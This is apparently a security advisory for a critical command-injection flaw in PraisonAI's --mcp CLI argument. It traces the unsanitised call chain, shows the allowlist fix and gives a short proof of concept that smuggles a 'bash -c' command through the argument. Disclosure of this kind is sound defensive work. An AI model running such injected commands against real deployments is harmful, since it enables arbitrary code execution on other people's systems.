PT-2026-53548 · Pypi · Praisonai

Publicado

2026-06-29

·

Atualizado

2026-06-29

CVSS v3.1

9.8

Crítica

VetorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

The --mcp CLI argument is passed directly to shlex.split() and forwarded through the call chain to anyio.open process() with no validation, allowlist check, or sanitization at any hop, allowing arbitrary OS command execution as the process user.

Details

cli/features/mcp.py:61 (source) -> praisonaiagents/mcp/mcp.py:345 (hop) -> mcp/client/stdio/ init .py:253 (sink)
python
# source
parts = shlex.split(command)

# hop
cmd, args, env = self.parse mcp command(command, env vars)
self.server params = StdioServerParameters(command=cmd, args=arguments)
 
# sink
process = await anyio.open process([command, *args])
Fixed in commit 47bff65413beaa3c21bf633c1fae4e684348368c (v4.5.69) by introducing a command allowlist:
python
ALLOWED COMMANDS = {"npx", "uvx", "node", "python"}
if cmd not in ALLOWED COMMANDS:
  raise ValueError(f"Disallowed command: {cmd}")

PoC

python
# tested on: praisonai==4.5.48
# install: pip install praisonai==4.5.48
# run: praisonai --mcp "bash -c 'id > /tmp/pwned'"
# verify: cat /tmp/pwned
# expected output: uid=1000(...) gid=1000(...) groups=1000(...)

Impact

Any deployment where the --mcp argument is influenced by untrusted input is exposed to full OS command execution as the process user. No authentication is required.

Correção

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Identificadores relacionados

PYSEC-2026-471

Produtos afetados

Praisonai